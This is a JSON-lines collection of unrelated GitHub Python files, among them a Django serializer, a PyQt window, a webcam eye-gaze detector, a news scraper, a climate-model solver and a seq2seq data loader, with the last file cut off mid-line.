x.execute_pipeline()\n print_list.append(total_distance_calc(x.relay_list, nodes_list[1:], UNIT_DISTANCE))\n x.reset()\n value_list.append(print_list)\n average_list.append(np.mean(value_list, axis=0))\n # pprint(average_list)\n tmp_node = DecentralizedNode(combined_simulator[3].sandbox, UNIT_DISTANCE, in_node=Node(Pos(0, 0)))\n tmp_node.type = NodeType.End\n tmp_node.parent = combined_simulator[3].relay_list[0]\n nodes_list.append(tmp_node)\n\n plt.plot(average_list)\n plt.grid(True)\n plt.legend([\"Simple Pursue Algorithm\", \"Improved Pursue Algorithm\", \"Greedy Algorithm\", \"Decentralized Algorithm\"])\n\n base_filename = \"testdata/test_\" + str(AVERAGE_SAMPLES) + \"samples_\" + str(MAX_NODE_COUNT) +\"nodes\"\n\n np.savetxt(base_filename+\".csv\", average_list, delimiter=\",\")\n plt.savefig(base_filename+\".png\")\n plt.clf()\n # plt.show()\n","repo_name":"MMWa/Topology-Adjustment","sub_path":"tester_avg_link_length.py","file_name":"tester_avg_link_length.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20720140462","text":"from django_countries.serializer_fields import CountryField\nfrom django_countries.serializers import CountryFieldMixin\nfrom rest_framework import serializers\n\nfrom .models import Hotspot\nfrom apps.rewards.models import Reward\nfrom apps.rewards.serializers import RewardSerializer\n\n\nclass HotspotSerializer(CountryFieldMixin, serializers.ModelSerializer):\n reward = RewardSerializer(many=True)\n country = CountryField(name_only=True)\n\n class Meta:\n model = Hotspot\n fields = [\n 'pkid',\n 'id',\n 'hotspot_name',\n 'hex_location',\n 'location_url',\n 'slug',\n 'hotspot_manager',\n 'homeowner_names',\n 'street_address',\n 'city',\n 'postal_code',\n 'state_or_province',\n 'country',\n 'phone_number',\n 'general_notes',\n 'full_url',\n 'reward',\n ]\n\n def create(self, validated_data):\n reward_data = validated_data.pop('reward')\n hotspot = Hotspot.objects.create(**validated_data)\n for reward_data in reward_data:\n Reward.objects.create(reward=reward, **reward_data)\n return hotspot\n\n\nclass HotspotCreateSerializer(CountryFieldMixin, serializers.ModelSerializer):\n country = CountryField(name_only=True)\n\n class Meta:\n model = Hotspot\n exclude = ['updated_at', ] # this means TimeStampedUUIDModel is excluded\n","repo_name":"neyona/helium-reader","sub_path":"apps/hotspots/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7385525408","text":"import unittest\nimport pandas as pd\nimport datetime as dt\n\nfrom app.domain.services.portfolio.portfolio_service import PortfolioService\nfrom app.domain.services.strategy.mock_strategy_service import MockStrategyService\nfrom app.domain.model.portfolio.portfolio_type import PortfolioType\nfrom app.infrastructure.config import app_config\n\n\nclass TestPortfolioService(unittest.TestCase):\n def setUp(self):\n dates = ['2020-03-01', '2020-03-02', '2020-03-03']\n dates = list(map(lambda x: dt.datetime.strptime(x, \"%Y-%m-%d\"), dates))\n spot = [100, 105, 90]\n open = [100, 105, 90]\n high = [100, 105, 90]\n low = [100, 105, 90]\n close = [100, 105, 90]\n vol = [100, 105, 90]\n df = pd.DataFrame(list(zip(dates, spot, open, high, low, close, vol)),\n columns=[app_config.AS_OF_DATE, app_config.SPOT,\n app_config.OPEN, app_config.HIGH,\n app_config.LOW, app_config.CLOSE,\n app_config.VOLATILITY])\n df[app_config.TURNOVER] = 0\n strat_service = MockStrategyService()\n self.ptf_service = PortfolioService(asset_values=df,\n initial_capital=1000,\n ptf_type=PortfolioType.SHORT_ALLOWED,\n strategy_service=strat_service)\n print()\n\n def tearDown(self):\n pass\n\n def test_evaluate_all(self):\n self.ptf_service.evaluate_all()\n ptf = self.ptf_service.portfolio[0]\n self.assertEqual(1000, ptf.liquidative_value)\n ptf = self.ptf_service.portfolio[1]\n self.assertEqual(1005, ptf.liquidative_value)\n ptf = self.ptf_service.portfolio[2]\n self.assertEqual(975, ptf.liquidative_value)\n\n def test_to_df(self):\n df = self.ptf_service.ptf_to_df()\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"robinleruth/commando-project","sub_path":"tests/test_portfolio_service.py","file_name":"test_portfolio_service.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14928804581","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\nfrom ui.changePassword import changePasswordDialog\n\n\nclass PersonCenter_window(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(421, 411)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.photo = QtWidgets.QLabel(self.centralwidget)\n self.photo.setGeometry(QtCore.QRect(120, 40, 151, 141))\n self.photo.setAutoFillBackground(False)\n self.photo.setText(\"\")\n self.photo.setPixmap(QtGui.QPixmap(\"../img/xg.jpg\"))\n self.photo.setScaledContents(True)\n self.photo.setObjectName(\"photo\")\n self.username = QtWidgets.QLabel(self.centralwidget)\n self.username.setGeometry(QtCore.QRect(70, 220, 111, 41))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.username.setStyleSheet(\"font: 16pt; font: bold\")\n self.username.setObjectName(\"username\")\n self.secret = QtWidgets.QPushButton(self.centralwidget)\n self.secret.setGeometry(QtCore.QRect(150, 310, 121, 41))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.secret.setStyleSheet(\"font: 13pt\")\n self.secret.setObjectName(\"pushButton\")\n self.back = QtWidgets.QPushButton(self.centralwidget)\n self.back.setGeometry(QtCore.QRect(290, 310, 121, 41))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.back.setStyleSheet(\"font: 13pt\")\n self.back.setObjectName(\"pushButton_2\")\n self.setphoto = QtWidgets.QPushButton(self.centralwidget)\n self.setphoto.setGeometry(QtCore.QRect(10, 310, 121, 41))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.setphoto.setStyleSheet(\"font: 13pt\")\n self.setphoto.setObjectName(\"pushButton_3\")\n self.name = QtWidgets.QLabel(self.centralwidget)\n self.name.setGeometry(QtCore.QRect(180, 220, 231, 41))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.name.setStyleSheet(\"font: 16pt; font: bold\")\n self.name.setObjectName(\"name\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n # self.secret.clicked.connect(secretButtonClicked)\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"个人中心\"))\n self.username.setText(_translate(\"MainWindow\", \"用户名:\"))\n self.secret.setText(_translate(\"MainWindow\", \"修改密码\"))\n self.back.setText(_translate(\"MainWindow\", \"返回\"))\n self.setphoto.setText(_translate(\"MainWindow\", \"更换头像\"))\n\n","repo_name":"Cannhy/Pyqt5-UI-Design","sub_path":"ui/PersonCenter_window.py","file_name":"PersonCenter_window.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6746997506","text":"import cv2\nimport numpy as np\nimport dlib\nfrom math import hypot\n\ncap = cv2.VideoCapture(0)\n\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n\n\ndef mid_point(p1, p2):\n return int((p1.x + p2.x) / 2), int((p1.y + p2.y) / 2)\n\n\ndef get_blinking_ratio(eye_points, facial_landmarks):\n left_point = (facial_landmarks.part(eye_points[0]).x, facial_landmarks.part(eye_points[0]).y)\n right_point = (facial_landmarks.part(eye_points[3]).x, facial_landmarks.part(eye_points[3]).y)\n center_top = mid_point(facial_landmarks.part(eye_points[1]), facial_landmarks.part(eye_points[2]))\n center_bottom = mid_point(facial_landmarks.part(eye_points[5]), facial_landmarks.part(eye_points[4]))\n\n # hor_line = cv2.line(frame, left_point, right_point, (0, 255, 0), 2)\n # ver_line = cv2.line(frame, center_top, center_bottom, (0, 255, 0), 2)\n\n hor_line_length = hypot((left_point[0] - right_point[0]), (left_point[1] - right_point[1]))\n ver_line_length = hypot((center_top[0] - center_bottom[0]), (center_top[1] - center_bottom[1]))\n\n ratio = hor_line_length / ver_line_length\n return ratio\n\n\nfont = cv2.FONT_HERSHEY_PLAIN\n\n\ndef get_gaze_ratio(eye_points, facial_landmarks):\n # Gaze direction\n left_eye_region = np.array([(facial_landmarks.part(eye_points[0]).x, facial_landmarks.part(eye_points[0]).y),\n (facial_landmarks.part(eye_points[1]).x, facial_landmarks.part(eye_points[1]).y),\n (facial_landmarks.part(eye_points[2]).x, facial_landmarks.part(eye_points[2]).y),\n (facial_landmarks.part(eye_points[3]).x, facial_landmarks.part(eye_points[3]).y),\n (facial_landmarks.part(eye_points[4]).x, facial_landmarks.part(eye_points[4]).y),\n (facial_landmarks.part(eye_points[5]).x, facial_landmarks.part(eye_points[5]).y)],\n np.int32)\n # cv2.polylines(frame, [left_eye_region], True, (0, 0, 255), 2)\n\n height, width, _ = frame.shape\n mask = np.zeros((height, width), np.uint8)\n cv2.polylines(mask, [left_eye_region], True, 255, 2)\n cv2.fillPoly(mask, [left_eye_region], 255)\n eye = cv2.bitwise_and(gray, gray, mask=mask)\n\n min_x = np.min(left_eye_region[:, 0])\n max_x = np.max(left_eye_region[:, 0])\n min_y = np.min(left_eye_region[:, 1])\n max_y = np.max(left_eye_region[:, 1])\n\n gray_eye = eye[min_y: max_y, min_x: max_x]\n # gray_eye = cv2.cvtColor(eye, cv2.COLOR_BGR2GRAY)\n _, threshold_eye = cv2.threshold(gray_eye, 70, 255, cv2.THRESH_BINARY)\n height, width = threshold_eye.shape\n left_side_threshold = threshold_eye[0: height, 0: int(width / 2)]\n left_side_white = cv2.countNonZero(left_side_threshold)\n\n right_side_threshold = threshold_eye[0: height, int(width / 2): width]\n right_side_white = cv2.countNonZero(right_side_threshold)\n\n upper_side_threshold = threshold_eye[int(height / 2): height, 0: width]\n upper_side_white = cv2.countNonZero(upper_side_threshold)\n\n lower_side_threshold = threshold_eye[0: int(height / 2), 0: width]\n lower_side_white = cv2.countNonZero(lower_side_threshold)\n\n gaze_ratio_horizontal = left_side_white / (right_side_white + 0.00000001)\n gaze_ratio_vertical = lower_side_white / (upper_side_white + 0.00000001)\n\n return gaze_ratio_horizontal, gaze_ratio_vertical\n\n\nblinking_frames = 0\nwhile True:\n _, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = detector(gray)\n for face in faces:\n x, y = face.left(), face.top()\n x1, y1 = face.right(), face.bottom()\n cv2.rectangle(frame, (x, y), (x1, y1), (0, 255, 0), 2)\n\n landmarks = predictor(gray, face)\n\n # Detect blinking\n left_eye_ratio = get_blinking_ratio([36, 37, 38, 39, 40, 41], landmarks)\n right_eye_ratio = get_blinking_ratio([42, 43, 44, 45, 46, 47], landmarks)\n blinking_ratio = (left_eye_ratio + right_eye_ratio) / 2\n if blinking_ratio > 4.4: # ayarla\n cv2.putText(frame, \"BLINKING\", (50, 150), font, 4, (255, 0, 0))\n blinking_frames += 1\n if blinking_frames == 10:\n cv2.putText(frame, \"Closed Eyes\", (50, 200), font, 4, (255, 0, 0))\n else:\n blinking_frames = 0\n\n # Gaze detection\n gaze_ratio_horizontal_left_eye, gaze_ratio_vertical_left_eye = get_gaze_ratio([36, 37, 38, 39, 40, 41],\n landmarks)\n gaze_ratio_horizontal_right_eye, gaze_ratio_vertical_right_eye = get_gaze_ratio([42, 43, 44, 45, 46, 47],\n landmarks)\n gaze_ratio_horizontal = (gaze_ratio_horizontal_right_eye + gaze_ratio_horizontal_left_eye) / 2\n gaze_ratio_vertical = (gaze_ratio_vertical_right_eye + gaze_ratio_vertical_left_eye) / 2\n\n # cv2.putText(frame, str(gaze_ratio_left_eye), (50, 100), font, 2, (0, 0, 255), 3)\n # cv2.putText(frame, str(gaze_ratio_right_eye), (50, 150), font, 2, (0, 0, 255), 3)\n # cv2.putText(frame, str(gaze_ratio_vertical), (50, 200), font, 2, (0, 0, 255), 3)\n\n if gaze_ratio_vertical < 0.36:\n cv2.putText(frame, \"UPPER\", (50, 100), font, 2, (0, 0, 255), 3)\n elif gaze_ratio_horizontal < 0.5:\n cv2.putText(frame, \"RIGHT\", (50, 100), font, 2, (0, 0, 255), 3)\n elif 0.5 < gaze_ratio_horizontal < 2:\n cv2.putText(frame, \"CENTER\", (50, 100), font, 2, (0, 0, 255), 3)\n else:\n cv2.putText(frame, \"LEFT\", (50, 100), font, 2, (0, 0, 255), 3)\n\n #\n # if gaze_ratio_horizontal < 0.5:\n # cv2.putText(frame, \"RIGHT\", (50, 100), font, 2, (0, 0, 255), 3)\n # elif 0.5 < gaze_ratio_horizontal < 2:\n # cv2.putText(frame, \"CENTER\", (50, 100), font, 2, (0, 0, 255), 3)\n # else:\n # cv2.putText(frame, \"LEFT\", (50, 100), font, 2, (0, 0, 255), 3)\n\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1)\n if key == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"oguzhan-serttas/eye-gaze-direction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42888556891","text":"import re\n\nimport fake_useragent\nimport requests\nimport tools\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime, timedelta\nimport time\ntry:\n r = tools.conn('https://akipress.org/')\n soup = BeautifulSoup(r, 'html.parser')\n t0 = soup.find('table', {'class': 'sections section-last'})\n houp = BeautifulSoup(str(t0), 'html.parser')\n t = houp.find_all('td', {'class':'datetxt'})\n t1 = houp.find_all('a', {'class':'newslink'})\n for j in range(0, 20):\n l1 = t[j].text\n l1= ' '.join(l1.split())\n if l1 != '':\n t2 = str(t1[j])\n s = t[j].text\n s = s[1:6]\n link = t2[str.find(t2, 'href') + 7:]\n if requests.get('https://akipress.org' + link[:str.find(link, '\"')]).status_code != 404:\n link = 'https://akipress.org' + link[:str.find(link, '\"')]\n else:\n if requests.get('https:/'+link[:str.find(link, '\"')]).status_code != 404:\n link = 'https:/'+link[:str.find(link, '\"')]\n else:\n link = link[:str.find(link, '\"')]\n lead_head = t1[j].text\n\n time_head = datetime.strptime(datetime.today().strftime('%d_%m_%Y') + '|' + s,\n \"%d_%m_%Y|%H:%M\")\n if time_head - timedelta(hours=3) < datetime.today():\n if time_head - timedelta(hours=3) > datetime.today() - timedelta(seconds=359):\n pic = ''\n second_head = ''\n try:\n r = tools.conn(link)\n loup = BeautifulSoup(r, 'html.parser')\n x1 = loup.find('meta', {'property':'og:image'})\n pigs = str(x1)\n pic = pigs[str.find(pigs, 'content') + 9:]\n pic = pic[:str.find(pic, '\"')]\n if str.find(pic, 'https:') == -1:\n pic = 'https:' + pic\n x2 = loup.find('meta', {'property': 'og:description'})\n pigs = str(x2)\n second_head = pigs[str.find(pigs, 'content') + 9:]\n second_head = second_head[:str.find(second_head, '\"')]\n if str.find(pic, 'https:') == -1:\n pic = 'https:' + pic\n except Exception as exx:\n pic = 'img//akipress_logo.png'\n print(exx)\n tools.tg_post(lead_head, second_head, link)\n print(pic)\nexcept Exception as exx:\n print(exx)","repo_name":"AndrewOdn/RandomParsers","sub_path":"akipress.py","file_name":"akipress.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22106168426","text":"import datetime\nimport time\nimport os\n\n\ndotime = [(14, 26), (14, 27)] # [小时,分钟]\ndocommand =\"echo 'sx'\"\n\n\ndef do():\n val = os.system(docommand)\n # print(\"val1:%s\" % val)\n if val == 0:\n print(\"运行成功\")\n else:\n print(\"失败啦\")\n time.sleep(66)\n\n\ndef main():\n ifdo = False\n while True:\n while True:\n now = datetime.datetime.now()\n # print(now)\n # print(\"now %s:%s\" % (now.hour, now.minute))\n for h, m in dotime:\n if now.hour == h and now.minute == m:\n ifdo = True\n break\n if ifdo == True:\n break\n time.sleep(18)\n # print(\"h:m %s:%s\" % (h, m))\n do()\n ifdo = False\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MeawHB/hey","sub_path":"定时.py","file_name":"定时.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13890079820","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 11.11.2020\n\n@author: Olav Milian\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.sparse as sparse\nfrom scipy.sparse.linalg import spsolve, lsqr\n\n# some constants\nG_SC = 1360\nA_out = 201.4\nB_out = 1.45\ns2 = -0.477\nau = 0.38\nal = 0.68\nk = 0.34 #OBS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\nR_e = 6.3781e6\nD = 0.649 #k / R_e\nT_s = -10\n# The goal for Q\nQ_goal = G_SC / 4\n\n# the co-albedo\ndef a(xvec, x_s):\n # xvec - array of x values\n # x_s - parameter for ice-cap location\n if isinstance(xvec, (int, float)):\n xvec = np.asarray([xvec])\n\n # initialize the output vector\n avec = np.zeros_like(xvec)\n # indices\n argu = np.nonzero(xvec > x_s)\n argl = np.nonzero(xvec < x_s)\n args = np.nonzero(xvec == x_s)\n # set the values\n avec[argu] = au\n avec[argl] = al\n avec[args] = (au + al) / 2\n return avec\n\n# the annual average\nS = lambda x: 1 + s2 * (3 * x * x - 1) / 2\n\n# function to get the FDM matrix A\ndef getAbF(N, x_s):\n # the grid size\n h = 1 / (N + 1)\n # define 1/h^2 as a constant\n hh = h * h\n # values of x in the uniform grid\n xvec = np.linspace(0, 1, N + 2)\n # initialize A and b\n A = sparse.dok_matrix((N+2, N+2))\n b = - A_out * np.ones(N+2)\n F = a(xvec, x_s) * S(xvec)\n\n # Internal nodes\n for i in range(1, N+1):\n xi = xvec[i]\n A[i, i] = D * (1 - xi * xi) * 2 / hh + B_out\n A[i, i+1] = - D * ((1 - xi * xi) / hh + xi / h)\n A[i, i-1] = - D * ((1 - xi * xi) / hh - xi / h)\n\n # BC x=0\n A[0, 0] = - 1 / h\n A[0, 1] = 1 / h\n b[0] = 0\n F[0] = 0\n\n # BC x=1\n A[N+1, N+1] = - D / h + B_out\n A[N+1, N] = D / h\n # F[N+1] = a(1, x_s) * S(1)\n return A, b, F\n\ndef Solve_bvp(N, x_s, Q):\n # the x - vector\n xvec = np.linspace(0, 1, N + 2)\n # get A, b and F\n A, b, F = getAbF(N, x_s)\n # solve the system for given Q\n Tvec = spsolve(A.tocsr(), b + Q_goal * F)\n\n return xvec, Tvec\n\n\ndef plotTx(xvec, Tvec, x_s):\n plt.figure()\n\n plt.plot(xvec, Tvec, label=\"$T(x)$\")\n plt.plot(x_s, T_s, 'ro', label=\"$(x_s, T_s)$\")\n plt.hlines(-10, xmin=0, xmax=1, linestyles='--', color='k', label='$T_s=-10^{\\circ}C$')\n T_mean = np.mean(Tvec)\n plt.hlines(T_mean, xmin=0, xmax=1, linestyles='--', color='g',\n label='$T_{avg}=' + '{:.2f}'.format(T_mean) +'^{\\circ}C$')\n plt.grid()\n plt.xlim(0, 1)\n plt.xlabel(\"$x$\")\n plt.ylabel(\"Temperature, $^{\\circ}C$\")\n plt.legend(loc=9, bbox_to_anchor=(0.5, -0.11), ncol=4)\n plt.title(\"Temperature, $T(x)$\")\n plt.show()\n\ndef Q_finder(N, x_s):\n # get A, b, F\n A, b, F = getAbF(N, x_s)\n # the step size\n h = 1 / (N + 1)\n # values of x in the uniform grid\n xvec = np.linspace(0, 1, N + 2)\n # index of the largest x smaller than x_s\n k = int(x_s / h)\n # call it xk\n xk = xvec[k]\n xk1 = xvec[k + 1]\n\n\n Abar = sparse.lil_matrix((N + 3, N + 3))\n # insert A into Abar\n Abar[:-1, :-1] = A\n # insert F into Abar\n Abar[:-1, -1] = - F.reshape((N + 2, 1)) # make column-vector of the row-vector\n\n Abar[-1, k] = (xk1 - x_s) / h\n Abar[-1, k+1] = (x_s - xk) / h\n Fbar = np.zeros(N+3)\n Fbar[:-1] = b\n Fbar[-1] = -10\n\n TQvec = spsolve(Abar.tocsr(), Fbar)\n Q = TQvec[-1]\n Tvec = TQvec[:-1]\n print(Q, Q_goal, abs(Q - Q_goal))\n print((xk1 - x_s) / h * TQvec[k] + (x_s - xk) / h * TQvec[k+1])\n\n # Tvec = spsolve(A.tocsr(), b + Q * F)\n plotTx(xvec, Tvec, x_s)\n\n Tvec = spsolve(A.tocsr(), b + Q_goal * F)\n plotTx(xvec, Tvec, x_s)\n\nQ_finder(N=500, x_s=0.95)\n\n\n\n\n\n\n\n\n\n\n\n# number of interior nodes\nN = 500\n# position of ice cap.\nx_s = 0.77\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"OlavMSG/MatMod-Project-fall-2020","sub_path":"Question8FDMforTQ.py","file_name":"Question8FDMforTQ.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34951190032","text":"import json\nimport os\n\n\nroot = os.getcwd()\nvalues = json.load(open(root + '\\\\values\\\\num.json'))['udp_data']['road_data']\n\n\nclass Vehicle(object):\n\n def __init__(self, partnr, vehicletype, position, dynamics):\n self.partnr = partnr\n self.type = vehicletype\n self.position = position\n self.dynamics = dynamics\n\n self.time_to_inter = None\n self.time_to_inter_front = None\n self.time_to_inter_back = None\n\n def timeToInter(self, dis_to_inter=None):\n if dis_to_inter is None:\n dis_to_inter = self.disToInter()\n\n if self.dynamics.velocity != 0:\n self.time_to_inter = dis_to_inter / self.dynamics.velocity\n self.time_to_inter_front = (dis_to_inter - self.type.carlength / 2) / self.dynamics.velocity\n self.time_to_inter_back = (dis_to_inter + self.type.carlength / 2) / self.dynamics.velocity\n else:\n self.time_to_inter = -1\n self.time_to_inter_front = -1\n self.time_to_inter_back = -1\n\n def getDuration(self):\n return abs(self.time_to_inter_back - self.time_to_inter_front)\n\n def disToInter(self):\n xpos_lane = values['xpos_end_merginglane']\n return xpos_lane - self.position.xpos\n\n def front(self):\n return self.position.xpos + self.type.carlength / 2\n\n def back(self):\n return self.position.xpos - self.type.carlength / 2\n\n\nclass Type(object):\n\n def __init__(self, cartype, carlength):\n self.cartype = cartype\n self.carlength = carlength\n\n\nclass Position(object):\n\n def __init__(self, xpos, ypos, heading, lane, segment):\n self.xpos = xpos\n self.ypos = ypos\n self.heading = heading\n self.lane = lane\n self.segment = segment\n\n\nclass Dynamics(object):\n\n def __init__(self, velocity, dis_to_inter, acc=0):\n self.velocity = velocity\n self.dis_to_inter = dis_to_inter\n self.acc = acc\n\n\nclass MainVehicle(Vehicle):\n\n def __init__(self, partnr, vehicletype, position, dynamics):\n super(). __init__(partnr, vehicletype, position, dynamics)\n self.min_speed = 70 / 3.6\n self.max_acc = 0.23\n self.max_speed = 90\n self.min_advisory = 60\n\n\n\n","repo_name":"suitendaal/HMI","sub_path":"classes/vehicle_STsoftware.py","file_name":"vehicle_STsoftware.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9410627261","text":"import pandas as pd\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\n\ndef calculate_cyclic_encoding(Column: pd.Series, range_size: int, mode: str = 'sin'):\n if mode == 'cos':\n return np.cos(Column*(2.*np.pi/range_size))\n else:\n return np.sin(Column*(2.*np.pi/range_size))\n\ndef my_train_valid_split(Data: pd.DataFrame, target_col:str, random_seed:int,\n split_data: str, validation_data_size: float = 0.2,\n stratify:bool = False):\n \n if split_data == 'chronological':\n Data = Data.sort_values('order_time')\n split_index = int(np.round(len(Data) * (1-validation_data_size)))\n Data_train = Data.iloc[:split_index].copy()\n Data_valid = Data.iloc[split_index:].copy()\n\n X_train = Data_train.drop([target_col,'order_time'],axis=1)\n y_train = Data_train[target_col]\n X_valid = Data_valid.drop([target_col,'order_time'],axis=1)\n y_valid = Data_valid[target_col]\n\n elif split_data == 'normal':\n if stratify:\n stratify_col = Data[target_col]\n else:\n stratify_col = None\n \n X_train, X_valid, y_train, y_valid = train_test_split(Data.drop([target_col,'order_time'], axis=1),\n Data[target_col],\n test_size=validation_data_size,\n stratify=stratify_col,\n random_state=random_seed)\n else:\n raise ValueError(\"Unrecognised split type: %s. Options are: ['normal', 'chronological]\")\n\n return (X_train, X_valid, y_train, y_valid)\n ","repo_name":"amr-jawwad/dragon-fruit","sub_path":"dragon_fruit/calculation_functions/HelperFunctions.py","file_name":"HelperFunctions.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73315214885","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n对 requests 的封装\n\"\"\"\n\n# 请先安装requests\n# pip install requests\n\nimport random\nimport requests\nfrom requests.exceptions import ConnectionError, Timeout\n\n\ndef requests_get(url, **kwargs):\n USER_AGENTS = (\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:11.0) Gecko/20100101 Firefox/11.0',\n 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100 101 Firefox/22.0',\n 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0',\n ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) '\n 'Chrome/19.0.1084.46 Safari/536.5'),\n ('Mozilla/5.0 (Windows; Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46'\n 'Safari/536.5')\n )\n\n # 如果有代理,请把下面的注释去掉\n # PROXIES = {\n # \"http\": \"http://user:password@proxy:port\",\n # }\n\n try:\n r = requests.get(\n url,\n timeout=30,\n headers={'User-Agent': random.choice(USER_AGENTS)},\n # proxies=PROXIES,\n **kwargs\n )\n except ConnectionError:\n print('Network connection failed.')\n except Timeout:\n print('timeout.')\n return r\n","repo_name":"bonfy/python-notes","sub_path":"1_requests.py","file_name":"1_requests.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15418217709","text":"from random import randint, shuffle, choice\nfrom random import random as rand\nimport math\nimport torch\n\nfrom loader_utils import get_random_word, batch_list_to_batch_tensors, Pipeline\nTopK = 1\n\n# Input file format :\n# 1. One sentence per line. These should ideally be actual sentences,\n# not entire paragraphs or arbitrary spans of text. (Because we use\n# the sentence boundaries for the \"next sentence prediction\" task).\n# 2. Blank lines between documents. Document boundaries are needed\n# so that the \"next sentence prediction\" task doesn't span between documents.\n\n\ndef truncate_tokens_pair(tokens_a, tokens_b, max_len, max_len_a=0, max_len_b=0, trunc_seg=None, always_truncate_tail=False):\n\tnum_truncated_a = [0, 0]\n\tnum_truncated_b = [0, 0]\n\twhile True:\n\t\tif len(tokens_a) + len(tokens_b) <= max_len:\n\t\t\tbreak\n\t\tif (max_len_a > 0) and len(tokens_a) > max_len_a:\n\t\t\ttrunc_tokens = tokens_a\n\t\t\tnum_truncated = num_truncated_a\n\t\telif (max_len_b > 0) and len(tokens_b) > max_len_b:\n\t\t\ttrunc_tokens = tokens_b\n\t\t\tnum_truncated = num_truncated_b\n\t\telif trunc_seg:\n\t\t\t# truncate the specified segment\n\t\t\tif trunc_seg == 'a':\n\t\t\t\ttrunc_tokens = tokens_a\n\t\t\t\tnum_truncated = num_truncated_a\n\t\t\telse:\n\t\t\t\ttrunc_tokens = tokens_b\n\t\t\t\tnum_truncated = num_truncated_b\n\t\telse:\n\t\t\t# truncate the longer segment\n\t\t\tif len(tokens_a) > len(tokens_b):\n\t\t\t\ttrunc_tokens = tokens_a\n\t\t\t\tnum_truncated = num_truncated_a\n\t\t\telse:\n\t\t\t\ttrunc_tokens = tokens_b\n\t\t\t\tnum_truncated = num_truncated_b\n\t\t# whether always truncate source sequences\n\t\tif (not always_truncate_tail) and (rand() < 0.5):\n\t\t\tdel trunc_tokens[0]\n\t\t\tnum_truncated[0] += 1\n\t\telse:\n\t\t\ttrunc_tokens.pop()\n\t\t\tnum_truncated[1] += 1\n\treturn num_truncated_a, num_truncated_b\n\n\nclass C_Seq2SeqDataset(torch.utils.data.Dataset):\n\t\"\"\" Load sentence pair (sequential or random order) from corpus \"\"\"\n\n\tdef __init__(self, file_src, file_tgt, batch_size, tokenizer, max_len, file_oracle=None, short_sampling_prob=0.1,\n\t\t\t\t sent_reverse_order=False, bi_uni_pipeline=[]):\n\t\tsuper().__init__()\n\t\tself.tokenizer = tokenizer # tokenize function\n\t\tself.max_len = max_len # maximum length of tokens\n\t\tself.short_sampling_prob = short_sampling_prob\n\t\tself.bi_uni_pipeline = bi_uni_pipeline\n\t\tself.batch_size = batch_size\n\t\tself.sent_reverse_order = sent_reverse_order\n\n\t\t# read the file into memory\n\t\tself.ex_list = []\n\t\tif file_oracle is None:\n\t\t\twith open(file_src, \"r\", encoding='utf-8') as f_src, open(file_tgt, \"r\", encoding='utf-8') as f_tgt:\n\n\t\t\t\tf_check = \".\"\n\n\t\t\t\tfor src, tgt in zip(f_src, 